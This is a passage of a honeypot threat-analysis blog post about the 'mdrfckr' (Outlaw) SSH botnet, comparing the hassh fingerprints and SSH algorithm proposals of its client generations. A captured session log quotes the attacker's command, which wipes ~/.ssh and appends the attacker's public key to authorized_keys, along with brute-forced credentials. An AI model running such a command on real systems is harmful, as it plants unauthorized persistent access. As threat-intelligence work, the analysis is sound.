&lt;pre class="highlight plaintext"&gt;&lt;code&gt;--- session d7bd19768db7 ---
12:07:11  CONNECT 36.134.69.15:43552
12:07:11  VER    SSH-2.0-libssh_0.11.1
12:07:11  KEX    hassh:e57221504a700ba6ecfb7c89dbf0009b
12:07:12  LOGIN  andres/123
12:07:13  CMD    cd ~; chattr -ia .ssh; lockr -ia .ssh
12:07:13  CMD!   lockr -ia .ssh  (command not found)
12:07:14  CMD    cd ~ &amp;amp;&amp;amp; rm -rf .ssh &amp;amp;&amp;amp; mkdir .ssh &amp;amp;&amp;amp; echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr"&amp;gt;&amp;gt;.ssh/authorized_keys &amp;amp;&amp;amp; chmod -R go= ~/.ssh &amp;amp;&amp;amp; cd ~    [KEY]
12:07:14  FILE↓  /home/andres/.ssh/authorized_keys  sha256:a8460f446be54041… (duplicate)
12:07:20  CLOSED duration 9.0 s

--- session 44a898e3ffd3 ---
12:07:14  CONNECT 36.134.69.15:44418
12:07:14  VER    SSH-2.0-libssh_0.11.1
12:07:15  KEX    hassh:e57221504a700ba6ecfb7c89dbf0009b
12:07:16  LOGIN  345gs5662d34/345gs5662d34
12:07:17  CLOSED duration 2.2 s

--- session 45a4fe1199eb ---
12:07:17  CONNECT 36.134.69.15:44884
12:07:17  VER    SSH-2.0-libssh_0.11.1
12:07:17  KEX    hassh:e57221504a700ba6ecfb7c89dbf0009b
12:07:19  LOGIN  andres/3245gs5662d34
12:07:20  CLOSED duration 2.7 s
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;All three recorded Gen-4 sessions have an &lt;strong&gt;identical hassh&lt;/strong&gt;, &lt;code&gt;e57221504a700ba6ecfb7c89dbf0009b&lt;/code&gt;. At the same time, three different credential combinations were used for authentication: &lt;code&gt;andres/123&lt;/code&gt;, &lt;code&gt;345gs5662d34/345gs5662d34&lt;/code&gt;, and &lt;code&gt;andres/3245gs5662d34&lt;/code&gt;. Given the small number of recorded sessions, there is insufficient data to state with full confidence that Gen-4 fully follows the behavioral pattern of previous generations. However, even this limited sample revealed a difference between the generations: a change in the SSH client's cryptographic proposal configuration.&lt;/p&gt;

&lt;h2&gt;
  
  
  Comparing the Cryptography of mdrfckr Generations
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Generation&lt;/th&gt;
&lt;th&gt;hassh&lt;/th&gt;
&lt;th&gt;client.version&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Gen-2&lt;/td&gt;
&lt;td&gt;&lt;code&gt;f555226df1963d1d3c09daf865abdc9a&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;SSH-2.0-libssh_0.9.6&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Gen-3&lt;/td&gt;
&lt;td&gt;&lt;code&gt;03a80b21afa810682a776a7d42e5e6fb&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;SSH-2.0-libssh_0.11.1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Gen-4&lt;/td&gt;
&lt;td&gt;&lt;code&gt;e57221504a700ba6ecfb7c89dbf0009b&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;SSH-2.0-libssh_0.11.1&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  1. Key Exchange
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Algorithm&lt;/th&gt;
&lt;th&gt;Gen-2&lt;/th&gt;
&lt;th&gt;Gen-3&lt;/th&gt;
&lt;th&gt;Gen-4&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;curve25519-sha256&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="mailto:curve25519-sha256@libssh.org"&gt;curve25519-sha256@libssh.org&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ecdh-sha2-nistp256&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ecdh-sha2-nistp384&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ecdh-sha2-nistp521&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;diffie-hellman-group18-sha512&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;diffie-hellman-group16-sha512&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;diffie-hellman-group-exchange-sha256&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;diffie-hellman-group14-sha256&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;diffie-hellman-group14-sha1&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;diffie-hellman-group1-sha1&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ext-info-c&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="mailto:kex-strict-c-v00@openssh.com"&gt;kex-strict-c-v00@openssh.com&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Разом&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;12&lt;/td&gt;
&lt;td&gt;11&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;11&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  2. Host Key
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Algorithm&lt;/th&gt;
&lt;th&gt;Gen-2&lt;/th&gt;
&lt;th&gt;Gen-3&lt;/th&gt;
&lt;th&gt;Gen-4&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;ssh-ed25519&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ecdsa-sha2-nistp521&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ecdsa-sha2-nistp384&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ecdsa-sha2-nistp256&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;a href="mailto:sk-ssh-ed25519@openssh.com"&gt;sk-ssh-ed25519@openssh.com&lt;/a&gt; (FIDO2)&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;a href="mailto:sk-ecdsa-sha2-nistp256@openssh.com"&gt;sk-ecdsa-sha2-nistp256@openssh.com&lt;/a&gt; (FIDO2)&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;rsa-sha2-512&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;rsa-sha2-256&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ssh-rsa (SHA-1, застарілий)&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ssh-dss (DSA, застарілий)&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Разом&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;8&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  3. encCS
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Algorithm&lt;/th&gt;
&lt;th&gt;Тип&lt;/th&gt;
&lt;th&gt;Gen-2&lt;/th&gt;
&lt;th&gt;Gen-3&lt;/th&gt;
&lt;th&gt;Gen-4&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="mailto:chacha20-poly1305@openssh.com"&gt;chacha20-poly1305@openssh.com&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;AEAD&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="mailto:aes256-gcm@openssh.com"&gt;aes256-gcm@openssh.com&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;AEAD&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="mailto:aes128-gcm@openssh.com"&gt;aes128-gcm@openssh.com&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;AEAD&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;aes256-ctr&lt;/td&gt;
&lt;td&gt;CTR&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;aes192-ctr&lt;/td&gt;
&lt;td&gt;CTR&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;aes128-ctr&lt;/td&gt;
&lt;td&gt;CTR&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;aes256-cbc&lt;/td&gt;
&lt;td&gt;CBC (legacy)&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;aes192-cbc&lt;/td&gt;
&lt;td&gt;CBC (legacy)&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;aes128-cbc&lt;/td&gt;
&lt;td&gt;CBC (legacy)&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3des-cbc&lt;/td&gt;
&lt;td&gt;legacy&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Разом&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;7&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  4. MAC
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Algorithm&lt;/th&gt;
&lt;th&gt;Gen-2&lt;/th&gt;
&lt;th&gt;Gen-3&lt;/th&gt;
&lt;th&gt;Gen-4&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="mailto:hmac-sha2-256-etm@openssh.com"&gt;hmac-sha2-256-etm@openssh.com&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="mailto:hmac-sha2-512-etm@openssh.com"&gt;hmac-sha2-512-etm@openssh.com&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="mailto:hmac-sha1-etm@openssh.com"&gt;hmac-sha1-etm@openssh.com&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;hmac-sha2-256&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;hmac-sha2-512&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;hmac-sha1&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Разом&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;1&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  5. compCS
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Algorithm&lt;/th&gt;
&lt;th&gt;Gen-2&lt;/th&gt;
&lt;th&gt;Gen-3&lt;/th&gt;
&lt;th&gt;Gen-4&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="mailto:zlib@openssh.com"&gt;zlib@openssh.com&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The tables show that the three mdrfckr generations use noticeably different sets of SSH algorithms. Gen-2 has the broadest proposal, supporting both modern algorithms and legacy mechanisms such as SHA-1, CBC, and 3DES. This provides broad coverage of different types of SSH servers.&lt;/p&gt;

&lt;p&gt;Gen-3, by contrast, presents a modernized configuration: legacy SHA-1, CBC, and 3DES have been removed from the set, while modern AEAD ciphers are present, including AES-GCM and ChaCha20-Poly1305. FIDO2 algorithms also appear, along with &lt;code&gt;kex-strict-c&lt;/code&gt;, which is associated with protection against Terrapin. At the same time, this configuration reduces compatibility with older SSH systems.&lt;/p&gt;

&lt;p&gt;Gen-4 retains the same &lt;code&gt;kexAlgs&lt;/code&gt; and &lt;code&gt;keyAlgs&lt;/code&gt; foundation as Gen-3, but has a fundamentally different symmetric encryption and MAC configuration. AEAD ciphers and SHA-2 MACs disappear, while CBC, 3DES, and &lt;code&gt;hmac-sha1&lt;/code&gt; return.&lt;/p&gt;

&lt;p&gt;This leaves an open question: &lt;strong&gt;why was Gen-4 created with such a noticeable regression in cryptographic configuration?&lt;/strong&gt; If the goal was to expand coverage of legacy systems, Gen-2 already had a sufficiently broad set of algorithms for such a scenario. Moreover, if the task was merely to form a new hassh fingerprint, bringing back deprecated algorithms was not necessary: theoretically, it would have been enough to change the order of their proposal or otherwise modify the algorithm lists.&lt;/p&gt;

&lt;p&gt;Therefore, the observed Gen-4 change should be viewed not simply as the creation of a new cryptographic profile, but as &lt;strong&gt;a separate modification of the SSH client whose purpose currently has no unambiguous explanation&lt;/strong&gt;. Based on the available data, at least two scenarios can be considered: Gen-4 may have been specifically configured to interact with a certain category of legacy systems, or the change to the cryptographic proposal may have been part of a mechanism for differentiating generations and evading hassh-based detections. At this stage, the available observations are insufficient to definitively confirm either scenario.&lt;/p&gt;

&lt;h2&gt;
  
  
  Sources
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://blog.port22.dk/mdrfckrs-part-one/" rel="noopener noreferrer"&gt;Outlaw Botnet Campaign Targeting SSH Servers (part one) — port22&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://blog.port22.dk/mdrfckrs-part-two/" rel="noopener noreferrer"&gt;The Outlaw Botnet Campaign Targeting SSH Servers (part two) — port22&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://isc.sans.edu/diary/32986" rel="noopener noreferrer"&gt;New Malware Libraries means New Signatures — SANS ISC Guest Diary №32986, Gokul Prema Thangavel&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>soc</category>
      <category>security</category>
      <category>honeypot</category>
      <category>botnet</category>
    </item>
  </channel>
</rss>
